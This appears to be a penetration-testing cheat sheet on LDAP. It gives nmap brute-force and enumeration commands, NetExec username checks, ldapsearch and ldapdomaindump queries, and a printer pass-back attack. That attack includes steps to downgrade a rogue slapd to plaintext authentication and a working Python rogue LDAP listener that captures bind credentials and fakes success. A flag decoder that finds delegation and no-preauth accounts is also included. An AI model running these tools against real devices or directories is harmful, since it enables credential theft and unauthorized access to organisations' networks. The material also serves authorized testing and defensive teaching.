LDAP (Lightweight Directory Access Protocol) Pentesting
LDAP (Lightweight Directory Access Protocol) is the standard protocol for querying and modifying directory services such as Active Directory and OpenLDAP. Default ports: 389 (LDAP, cleartext with optional StartTLS), 636 (LDAPS), 3268 (LDAP to the Global Catalog), 3269 (LDAP to the Global Catalog over SSL).
Enumeration
# Nmap
# ldap-brute: guesses passwords via simple binds; ldap.base is the base DN used for the attempts
nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 <target-ip>
# ldap-search: anonymous search (root DSE, naming contexts, and entries if anonymous read is allowed)
nmap --script ldap-search -p 389 <target-ip>
# All ldap-* scripts (quote the glob so the shell does not expand it against local files)
nmap --script "ldap-*" -p 389 <target-ip>
# All LDAP scripts except the brute forcer
nmap --script "ldap* and not brute" -p 389 <target-ip>
# NetExec
# -k: authenticate via Kerberos. Combined with a username list and an empty password this
#     works as a username check: the KDC answers differently for unknown principals
#     than for known ones whose pre-authentication fails
netexec ldap <target-ip> -u usernames.txt -p '' -k
# --trusted-for-delegation: list computers and users whose userAccountControl has the
#     TRUSTED_FOR_DELEGATION flag (unconstrained delegation)
# reference: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties#property-flag-descriptions
netexec ldap <target-ip> -u username -p password --trusted-for-delegation
Search LDAP
The following attribute types make up the distinguished names (DNs) used below:
- cn - Common Name
- dc - Domain Component
- ou - Organizational Unit
# -x: simple authentication (an anonymous bind when no -D is given)
# -H: server URI
# -b: base DN for the search
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com"
ldapsearch -x -H ldaps://10.0.0.1:636 -b "dc=example,dc=com"
# Authenticated bind
# -D: bind DN (Active Directory also accepts DOMAIN\user or user@domain here)
# -w: bind password on the command line
# -W: prompt for the bind password (keeps it out of the shell history)
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -w password
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -W
# List every sAMAccountName: the filter comes first, then the attributes to return
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" sAMAccountName
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" sAMAccountName | grep sAMAccountName
# Read a single object by using its DN as the search base
ldapsearch -x -H ldap://10.0.0.1 -b "cn=sample,cn=Users,dc=example,dc=com" -D "example\\name" -w 'password' "(objectclass=*)"
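The ldapsearch output above returns userAccountControl as a bare integer, and the NetExec --trusted-for-delegation check earlier is just a bit-matching filter on that attribute. The following Python script is an added example, not code from the original page, NetExec or OpenLDAP: it decodes userAccountControl values into flag names using the bit values from the Microsoft reference linked above, builds the extensible-match filter (LDAP_MATCHING_RULE_BIT_AND) for any flag, composes the matching ldapsearch command line, and parses ldapsearch's LDIF output to list the accounts with a given flag. It generalises the page's TRUSTED_FOR_DELEGATION case to any flag (for instance DONT_REQ_PREAUTH). The LDIF sample it reads is constructed for the example; the host, base DN and bind identity are placeholders.

```python
"""Decode userAccountControl bits and build LDAP bit-matching filters (added example)."""
from __future__ import annotations

import base64
import shlex

# Bit values from the Microsoft userAccountControl reference linked above.
UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,
    "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}

# Extensible-match rule OID LDAP_MATCHING_RULE_BIT_AND: all given bits must be set.
BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value: int) -> list[str]:
    """Names of every flag set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def uac_filter(*required: str, exclude: tuple[str, ...] = ()) -> str:
    """LDAP filter matching accounts that have all `required` flags and none of `exclude`."""
    parts = [f"(userAccountControl:{BIT_AND}:={UAC_FLAGS[f]})" for f in required]
    parts += [f"(!(userAccountControl:{BIT_AND}:={UAC_FLAGS[f]}))" for f in exclude]
    return parts[0] if len(parts) == 1 else "(&" + "".join(parts) + ")"


def ldapsearch_cmd(host: str, base: str, bind_dn: str, ldap_filter: str, *attrs: str) -> str:
    """Shell-quoted ldapsearch command; -W prompts for the password instead of -w."""
    argv = ["ldapsearch", "-x", "-LLL", "-H", f"ldap://{host}", "-b", base,
            "-D", bind_dn, "-W", ldap_filter, *attrs]
    return shlex.join(argv)


def parse_ldif(text: str) -> list[dict[str, list[str]]]:
    """Minimal LDIF reader for ldapsearch output: unfolds continuation lines,
    decodes base64 (`attr:: ...`) values and returns one dict per entry."""
    entries = []
    for block in text.replace("\n ", "").strip().split("\n\n"):
        entry: dict[str, list[str]] = {}
        for line in block.splitlines():
            if not line or line.startswith("#"):
                continue
            attr, _, value = line.partition(":")
            if value.startswith(":"):  # base64-encoded value
                value = base64.b64decode(value[1:].strip()).decode()
            entry.setdefault(attr, []).append(value.strip())
        if entry:
            entries.append(entry)
    return entries


def accounts_with(entries: list[dict[str, list[str]]], flag: str) -> list[str]:
    """sAMAccountNames whose userAccountControl has `flag` set."""
    bit = UAC_FLAGS[flag]
    return [e["sAMAccountName"][0] for e in entries
            if "userAccountControl" in e and int(e["userAccountControl"][0]) & bit]


# Constructed sample of ldapsearch -LLL output (placeholder names, not a real directory).
SAMPLE_LDIF = """\
dn: CN=ldapsvc,CN=Users,DC=example,DC=com
sAMAccountName: ldapsvc
userAccountControl: 66048

dn: CN=WEB01,OU=Servers,DC=example,DC=com
sAMAccountName: WEB01$
userAccountControl: 528384

dn: CN=svc_backup,CN=Users,DC=example,DC=com
sAMAccountName: svc_backup
userAccountControl: 4260352
"""

if __name__ == "__main__":
    print(ldapsearch_cmd("10.0.0.1", "dc=example,dc=com", "workspace\\ldap",
                         uac_filter("TRUSTED_FOR_DELEGATION", exclude=("ACCOUNTDISABLE",)),
                         "sAMAccountName", "userAccountControl"))
    for e in parse_ldif(SAMPLE_LDIF):
        uac = int(e["userAccountControl"][0])
        print(f"{e['sAMAccountName'][0]:12} {uac:>8}  {', '.join(decode_uac(uac))}")
```

Running it prints the ready-to-paste ldapsearch command for enabled accounts trusted for unconstrained delegation, then decodes the three sample entries: the computer WEB01$ carries TRUSTED_FOR_DELEGATION and svc_backup carries DONT_REQ_PREAUTH. Pipe real ldapsearch -LLL output into parse_ldif to do the same against a live domain.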
Dump Active Directory Information
With valid domain credentials, ldapdomaindump pulls users, groups, computers, policies and trusts out of Active Directory over LDAP and writes one file per object class.
# --no-html: disable the HTML output
# --no-grep: disable the greppable (TSV) output, leaving only JSON
# -o: output directory
ldapdomaindump -u 'DOMAIN\username' -p password <target-ip> --no-html --no-grep -o dumped
Connect
AD CS (Active Directory Certificate Services)
LAPS (Local Administrator Password Solution)
Pass-Back Attack
An attack against network devices such as printers that store a service account for LDAP lookups. If the admin panel lets you change the LDAP server address and offers a "test" button, the device will bind to whatever host you point it at, using the stored username and password.
For example, access http://printer.sub.example.com/settings.aspx
Open a listener on the LDAP port (389) on your machine so the printer can connect back to it.
In your browser, change the LDAP server address in the printer settings to your machine and test the LDAP settings; the printer sends the configured username and password to your listener.
Host Rogue LDAP Server
A netcat listener only shows the credentials when the device sends a simple bind in clear text. If the printer insists on negotiating a SASL mechanism or otherwise needs a real LDAP server to talk to, run a rogue OpenLDAP (slapd) instance and weaken its configuration so the client falls back to sending the password in clear.
Install the dependencies first (slapd for the server, ldap-utils for ldapmodify and ldapsearch).
Configure your own rogue LDAP server by executing the following command.
# -p low: ask every question, including low-priority ones
sudo dpkg-reconfigure -p low slapd
# ---------------------------------------------------
# in the configuration dialog, answer:
1. Omit OpenLDAP server configuration: No
2. DNS domain name: <target-domain>
3. Organization name: <target-domain>
4. Administrator password: <arbitrary-password>
5. Database backend to use: MDB
6. Do you want the database to be removed when slapd is purged?: No
7. Move old database?: Yes
Next, make the rogue server deliberately weak by downgrading the authentication mechanisms it offers: lowering the minimum SASL security strength factor (minssf) to 0 lets clients use plaintext mechanisms such as PLAIN and LOGIN.
Create the config file named "config.ldif" containing that setting.
Now apply the config file to the running server over the local ldapi socket.
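The page does not reproduce the contents of config.ldif. The fragment below is the setting commonly used for this purpose, added here rather than copied from the original page: it replaces the SASL security properties on the cn=config entry so that mechanisms with a security strength factor of 0 (plaintext PLAIN and LOGIN) are offered, while noanonymous and passcred still require the client to present credentials.

```ldif
# config.ldif: applied to the live cn=config database with ldapmodify -Y EXTERNAL -H ldapi://
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```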
# -Y: SASL mechanism
# -H: URI
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./config.ldif
sudo service slapd restart
To verify that the change took effect, query the root DSE (an ldapsearch with -s base and an empty base DN) for supportedSASLMechanisms; PLAIN and LOGIN should now be listed.
To capture the credentials, run tcpdump (or Wireshark) on the interface the printer reaches you through, filtering on TCP port 389.
In the browser, point the printer's LDAP settings at your machine and test them; the bind request, including the password, shows up in the capture in clear text.
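As an added example that is not from the original page, the following Python script is a stand-in for the netcat listener that speaks just enough LDAP (RFC 4511 BindRequest and BindResponse in BER encoding) to accept a simple bind from the printer, record the DN and password it sends, and answer success so that the device's "test" reports OK. The captured bind bytes in it are constructed for the example, and the DN and password are placeholders. It deliberately handles only simple binds: a StartTLS or SASL bind is logged and dropped, which is exactly the case where the slapd route above is needed.

```python
"""Minimal rogue LDAP listener that logs simple-bind credentials (added example)."""
import socketserver

# BER tags used below (RFC 4511 over the X.690 BER rules)
SEQUENCE, INTEGER, OCTET_STRING, ENUMERATED = 0x30, 0x02, 0x04, 0x0A
BIND_REQUEST, BIND_RESPONSE = 0x60, 0x61   # [APPLICATION 0], [APPLICATION 1]
SIMPLE_AUTH = 0x80                         # [0] OCTET STRING in AuthenticationChoice


def tlv(tag: int, payload: bytes) -> bytes:
    """Encode one BER tag-length-value with a definite length."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def ber_int(n: int) -> bytes:
    """BER INTEGER, two's complement, minimal length."""
    return tlv(INTEGER, n.to_bytes(n.bit_length() // 8 + 1, "big", signed=True))


def read_tlv(buf: bytes, pos: int = 0):
    """Decode the TLV at buf[pos]; returns (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_bind_request(msg_id: int, dn: str, password: str, version: int = 3) -> bytes:
    """What an LDAP client sends for a simple bind (used to build the sample below)."""
    body = ber_int(version) + tlv(OCTET_STRING, dn.encode()) + tlv(SIMPLE_AUTH, password.encode())
    return tlv(SEQUENCE, ber_int(msg_id) + tlv(BIND_REQUEST, body))


def parse_bind_request(data: bytes):
    """Return (messageID, version, dn, password) from a simple BindRequest; ValueError otherwise."""
    tag, msg, _ = read_tlv(data)
    if tag != SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, raw_id, pos = read_tlv(msg)
    if tag != INTEGER:
        raise ValueError("missing messageID")
    tag, body, _ = read_tlv(msg, pos)
    if tag != BIND_REQUEST:
        raise ValueError(f"not a BindRequest (protocolOp tag 0x{tag:02x})")
    tag, ver, pos = read_tlv(body)
    tag, name, pos = read_tlv(body, pos)
    tag, cred, _ = read_tlv(body, pos)
    if tag != SIMPLE_AUTH:
        raise ValueError("SASL bind, password is not sent in clear")
    return (int.from_bytes(raw_id, "big", signed=True), int.from_bytes(ver, "big"),
            name.decode(), cred.decode(errors="replace"))


def build_bind_response(msg_id: int, result_code: int = 0) -> bytes:
    """BindResponse carrying LDAPResult {resultCode, matchedDN "", diagnosticMessage ""}."""
    result = tlv(ENUMERATED, bytes([result_code])) + tlv(OCTET_STRING, b"") + tlv(OCTET_STRING, b"")
    return tlv(SEQUENCE, ber_int(msg_id) + tlv(BIND_RESPONSE, result))


# Constructed capture of a printer's bind (placeholder DN and password, not real data).
CAPTURED_BIND = (b"\x30\x34\x02\x01\x01\x60\x2f\x02\x01\x03\x04\x1c"
                 b"cn=ldapsvc,dc=example,dc=com" b"\x80\x0c" b"Sup3rSecret!")


class RogueLDAPHandler(socketserver.BaseRequestHandler):
    def handle(self):
        data = self.request.recv(4096)
        try:
            msg_id, version, dn, password = parse_bind_request(data)
        except (ValueError, IndexError) as exc:
            print(f"[{self.client_address[0]}] ignored: {exc}")
            return
        print(f"[{self.client_address[0]}] LDAPv{version} simple bind dn={dn!r} password={password!r}")
        self.request.sendall(build_bind_response(msg_id))   # success, so the printer's test passes


class RogueLDAPServer(socketserver.TCPServer):
    allow_reuse_address = True


if __name__ == "__main__":
    with RogueLDAPServer(("0.0.0.0", 389), RogueLDAPHandler) as server:   # port 389 needs root
        server.serve_forever()
```

Run it with root privileges (port 389), then trigger the printer's LDAP test. If the device sends an ExtendedRequest for StartTLS first, the log shows "ignored: not a BindRequest (protocolOp tag 0x77)", which tells you the cleartext path is not available and the slapd downgrade above is the way forward.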